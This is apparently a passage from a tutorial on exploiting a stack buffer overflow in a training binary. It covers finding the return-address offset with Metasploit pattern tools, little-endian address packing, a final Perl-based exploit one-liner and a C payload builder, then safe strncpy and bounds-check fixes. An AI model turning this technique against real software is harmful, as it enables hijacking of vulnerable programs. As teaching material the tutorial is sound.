Hackers have simplified what we did in the last step with pattern generation tools, and the Metasploit Framework ships two of them that work together: pattern_create.rb and pattern_offset.rb. Depending on which version you are running, they are located under the tools/ or tools/exploit/ directory of your Metasploit install. You give pattern_create.rb a length, and it generates a unique pattern of that size. The idea is to use that pattern as the overflow string; once it overwrites the return address, the return address will hold four ASCII characters from the pattern. That is where pattern_offset.rb comes in: give it that return address value and the length of the pattern, and it tells you how many bytes it took to get there. This is the lazy method because it removes the guesswork. Let's walk through it.


First we need to generate our pattern using Metasploit's pattern_create.rb tool. We will use 200 bytes as our length because we know that will overflow the return address:
X86 linux bof01 pattern create.png


Next, let's use the generated pattern to overflow the return address. Take note of the return address the program prints:
X86 linux bof01 pattern overflow.png


Lastly, we provide the overwritten return address value (now four ASCII characters from the pattern) to the pattern_offset.rb tool:
X86 linux bof01 pattern offset.png


And BOOM! We now know it takes 132 bytes to reach the return address. This tool is useful beyond the return address, too: if other registers hold pattern values just before the crash and you want to control them as well, you can give those values to pattern_offset.rb to learn how many bytes it takes to reach them.
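To demystify what the two scripts do, here is a C sketch of the same idea. It is not Metasploit's code: pattern_create() and pattern_offset() are hypothetical helpers that build a pattern in the style of Metasploit's default Aa0Aa1Aa2... layout (uppercase, lowercase, digit groups) and look up where a crashed return address's four bytes occur in it. Because the printed return address is a little-endian value, its bytes are unpacked lowest first before searching.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_PATTERN 8192   /* arbitrary cap for this sketch */

/* Writes `len` pattern characters plus a null into `out` (len + 1 bytes).
 * Each 3-character group is upper, lower, digit: Aa0 Aa1 ... Aa9 Ab0 ... */
void pattern_create(char *out, size_t len) {
    static const char upper[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    static const char lower[] = "abcdefghijklmnopqrstuvwxyz";
    static const char digit[] = "0123456789";
    assert(out != NULL);
    for (size_t i = 0; i < len; i++) {
        size_t group = i / 3;                      /* which 3-character group */
        switch (i % 3) {
        case 0:  out[i] = upper[(group / 260) % 26]; break;
        case 1:  out[i] = lower[(group / 10) % 26];  break;
        default: out[i] = digit[group % 10];         break;
        }
    }
    out[len] = '\0';
}

/* Returns where the 4 bytes of a crashed return address (the value as the
 * program prints it) appear in a `len`-byte pattern, or -1 if they don't. */
long pattern_offset(uint32_t ret, size_t len) {
    static char pattern[MAX_PATTERN + 1];
    char needle[5];
    if (len > MAX_PATTERN) return -1;
    pattern_create(pattern, len);
    for (size_t k = 0; k < 4; k++)                 /* little endian: low byte first */
        needle[k] = (char)((ret >> (8 * k)) & 0xffu);
    needle[4] = '\0';
    const char *hit = strstr(pattern, needle);
    return hit ? (long)(hit - pattern) : -1;
}
```

In this sketch's pattern, the four bytes at offset 132 are "Ae4A", so pattern_offset(0x41346541, 200) returns 132. Every 4-byte window is unique until the groups wrap around after 20,280 characters, well beyond the lengths used here.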


Great! So Now I Control the Return Address! Where Do I Make it Go?

Well, the objective said we should make it run the function not_called(), and the program output gives us its address (0x0804859b). Now, how do we put that value into our string? That is part of why we are using Perl print statements: Perl supports "\x##" escapes to place a hexadecimal byte value into a string. So let's try putting that address in as our return address overwrite value.


X86 linux bof01 overflow failed.png


Okay, Address Was Put In... Why Did It Fail?

Why did it fail? If we look at the return address, we can see that it seems to be backwards.
X86 linux bof01 overflow failed endian.png


Little Endian Formatting the Address

This happened because of the way x86 stores values in memory. It uses a byte order known as "little endian": the least significant byte of a multi-byte value is stored at the lowest address. For our purposes, that translates to "reverse the order of the bytes within each 4-byte value" (4-byte values are also known as DWORDs). If you really want to dive into little endian vs. big endian, see here. Either way, based on what we can see in the picture, it is easy to compensate for this by simply reversing the byte order of the overwrite value.


Examples:

  • 0x41424344 would have to be formatted as "\x44\x43\x42\x41"
  • 0xdeadbeef would have to be formatted as "\xef\xbe\xad\xde"
  • 0xcafebabe would have to be formatted as "\xbe\xba\xfe\xca"
  • 0x0badf00d would have to be formatted as "\x0d\xf0\xad\x0b"
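The reversal is mechanical, so it is easy to automate. Here is a small C sketch; format_le_escape() is a hypothetical helper that prints an address as the Perl "\x##" escapes, lowest byte first.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Writes addr as four "\x##" escapes, lowest byte first (little endian),
 * e.g. 0x0804859b -> \x9b\x85\x04\x08. `out` must hold 17 chars. */
void format_le_escape(uint32_t addr, char out[17]) {
    assert(out != NULL);
    for (int k = 0; k < 4; k++) {
        unsigned byte = (addr >> (8 * k)) & 0xffu;
        /* each escape is 4 characters: backslash, 'x', two hex digits */
        snprintf(out + 4 * k, (size_t)(17 - 4 * k), "\\x%02x", byte);
    }
}
```

For 0x0804859b this produces \x9b\x85\x04\x08, and for 0xdeadbeef it produces \xef\xbe\xad\xde, matching the examples above.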


Final Exploit

The final exploit against this program is as follows:


./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "\x9b\x85\x04\x08"')


X86 linux bof tut01 v1.0 final exploit.png
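The exercises at the end suggest scripting the exploit. As one possible starting point, here is a C sketch (build_payload() is a hypothetical name) that assembles the same bytes as the Perl command: 132 "A"s followed by 0x0804859b in little-endian order. It also refuses any address containing a 0x00 byte, because strcpy() stops at the first null byte and a command-line argument cannot contain one, so such an address could not be delivered this way.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills `out` with `junk` bytes of 'A', then `addr` little endian, then a
 * terminating null; `out` needs junk + 5 bytes. Returns the payload length
 * (junk + 4), or 0 if the address contains a null byte. */
size_t build_payload(char *out, size_t junk, uint32_t addr) {
    assert(out != NULL);
    for (int k = 0; k < 4; k++)
        if (((addr >> (8 * k)) & 0xffu) == 0)
            return 0;                      /* strcpy() would stop here */
    memset(out, 'A', junk);
    for (int k = 0; k < 4; k++)            /* lowest byte first */
        out[junk + k] = (char)((addr >> (8 * k)) & 0xffu);
    out[junk + 4] = '\0';
    return junk + 4;
}
```

build_payload(buf, 132, 0x0804859b) fills buf with the same 136 bytes the Perl one-liner prints; a small program that writes them to stdout could be used in place of the perl command inside $().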


How Could This Have Been Avoided?

The simplest way to avoid this issue would have been to use strncpy() instead of strcpy(), or to bounds-check the user input before calling strcpy(). A bounds check simply measures the user-supplied input, using something like strlen(), to make sure it fits in the buffer. The input's length must be at most the buffer size minus one byte, because one byte is needed for the null terminator. strncpy() is almost like strcpy(), but it takes a size argument and stops copying after that many bytes. Note that when strncpy() truncates, it does not write a null terminator, so you must set the buffer's last byte to '\0' yourself (or zero the buffer beforehand). It is also important to note that strncpy() used incorrectly will still produce a buffer overflow: if the developer sets the size parameter to the length of the user-supplied input while copying into a fixed-size buffer, the check is rendered useless. It is worth pointing out because I have seen it done. The usual best practice is to:

  1. Define a constant for the buffer's size, use that constant when declaring the char array, then pass the constant minus one as the size parameter to strncpy().
  2. Declare the char array with a fixed size, then pass sizeof(buffer) minus one as the size parameter to strncpy().


Example 1: Using the constant minus one method.

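	// Create a constant for the buffer size; this could be a global if desired.
	// In C a const variable is not a constant expression, so use #define (or an enum).
	#define BUFF_SIZE 120
 
	// Declare a local buffer.
	char buffer[BUFF_SIZE];
 
	// Safe way to copy the string: copy at most BUFF_SIZE - 1 bytes...
	strncpy(buffer, data, (BUFF_SIZE - 1));
	// ...then terminate it, since strncpy() adds no null byte when it truncates.
	buffer[BUFF_SIZE - 1] = '\0';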


Example 2: Using the sizeof minus one method.

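	// Declare a local buffer with a direct size.
	char buffer[120];
 
	// Safe way to copy the string: copy at most sizeof(buffer) - 1 bytes...
	strncpy(buffer, data, (sizeof(buffer) - 1));
	// ...then terminate it, since strncpy() adds no null byte when it truncates.
	buffer[sizeof(buffer) - 1] = '\0';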


Example 3:
THE WRONG WAY TO USE strncpy() THAT WILL MAKE A BUFFER OVERFLOW CONDITION! SO DON'T DO THIS!
	// Declare a local buffer with a direct size.
	char buffer[120];
 
	// Wrong way to use strncpy(): the size comes from user-controlled data.
	// This creates a buffer overflow condition, since "data" is user controlled
	// and may be larger than the buffer. It might as well be strcpy().
	strncpy(buffer, data, strlen(data));


Either of the first two examples would have been safe. The third would have been an exploitable condition, just like the one we already had.


If you are set on using strcpy() for some reason (which is advised against), you could instead call strlen() on the user data in an if statement to ensure it is at least one byte shorter than the buffer. If it isn't, you could throw an error, or truncate the input yourself by writing a null byte at the highest index your buffer can hold (index 119 for a 120-byte buffer, because indexing starts at zero; index 120 would actually be the 121st byte). This isn't recommended because it is easy to make off-by-one errors, sometimes called fence post errors (you need one fewer fence panel than fence posts, and a simple mistake is to buy the same quantity of both without giving it much thought). An off-by-one bug can actually become a security flaw by allowing an attacker to modify the lowest byte of the next DWORD on the stack.
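Here is a minimal C sketch of that strlen() check, assuming the 120-byte buffer from this lesson; copy_checked() is a hypothetical helper. The comparison uses >= rather than >, which is exactly the fence-post detail: a 120-byte buffer holds at most 119 characters plus the null byte.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, terminator included.
 * Returns 0 on success, or -1 if src is too long (dst is left untouched). */
int copy_checked(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && src != NULL && dst_size > 0);
    if (strlen(src) >= dst_size)   /* >=, not >: one byte is needed for '\0' */
        return -1;
    strcpy(dst, src);              /* safe here: the length was checked above */
    return 0;
}
```

Called as copy_checked(buffer, sizeof(buffer), data), a 119-character input is copied, while a 120-character input is rejected instead of writing its null byte one past the end of the buffer.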


Another mistake I made, which sometimes leads to a vulnerability, is that I didn't zero out the buffer before using it. When using variables, you should always assume the allocated space may already contain data, and "initialize" it by zeroing it out before use. You can do this with memset() or bzero(), although bzero() is not as portable as memset().
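A short C sketch of both ways to start from a clean buffer: zeroing the whole array at declaration with an initializer, and memset() on an existing buffer before reuse. reset_buffer() and is_zeroed() are hypothetical helpers; the sketch sticks to memset() for portability, as suggested above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* At declaration, `char buffer[120] = {0};` zeroes all 120 bytes.
 * For a buffer that is being reused, clear it explicitly: */
void reset_buffer(char *buf, size_t size) {
    assert(buf != NULL);
    memset(buf, 0, size);
}

/* Returns 1 if every byte of buf is zero, otherwise 0. */
int is_zeroed(const char *buf, size_t size) {
    for (size_t i = 0; i < size; i++)
        if (buf[i] != 0) return 0;
    return 1;
}
```

Pass sizeof(buffer) as the size when the array is in scope, so the cleared length always matches the declared length.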


Review and Additional Exercises

So from this lesson, make sure you understand:

  1. How to test for and detect buffer overflows by providing large input.
  2. How to determine the offset to overwrite the EBP and EIP.
  3. How controlling the EIP allows us to redirect the execution flow of the program.
  4. How to pack an address in Little Endian Format.


Exercises for the reader (optional, but a good idea to reinforce what you've learned):

  • Take some time to really understand these concepts above.
  • Take some time to place your final exploit into a script (bash, Python, Perl, etc., whatever you prefer) that you can simply call to exploit the binary. This will help in later lessons, where exploits will need to be scripted so they can be dynamic.
  • Take some time to edit the source code file and make a "fixed version" of this code that is no longer vulnerable, using one of the methods from the section on how this could have been avoided. Compile it and work through the detection process again to verify whether it worked.